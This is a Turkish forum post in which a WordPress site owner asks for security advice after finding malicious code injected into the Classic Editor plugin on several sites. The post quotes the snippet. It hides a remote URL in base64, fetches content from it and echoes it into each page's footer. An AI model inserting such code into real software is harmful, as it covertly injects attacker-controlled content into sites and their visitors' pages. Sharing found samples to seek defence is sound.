Merhaba,

Wordpress'in klasik düzenleyici eklentisinin php dosyasına eklenmişti bu kod. 5-6 siteye footer çıkıyordu bulmam 2-3 saat sürdü..

Sitem trafik aldıkça hem olumlu sponsorluk mailleri hem ddos hemde bu tarz hacklenmelerle karşılaşıyorum. Önlem olarak ne önerirsiniz acaba? wp adminden sızılmamış, cpanelde 2fa var zaten ama wordpressin w*rez olmayan eklentisi bile olsa sızılabiliyor bunlara önlem olarak ne yapabilirim?

add_action('wp_footer', function() {
    $url = base64_decode('aHR0cHM6Ly9tYW5hZ2VyLXVwZGF0ZS5ibG9nL2xpbmsvbGVvLmh0bWw=');
    $content = file_get_contents($url);
    if ($content !== false) {
        echo $content;
    }
});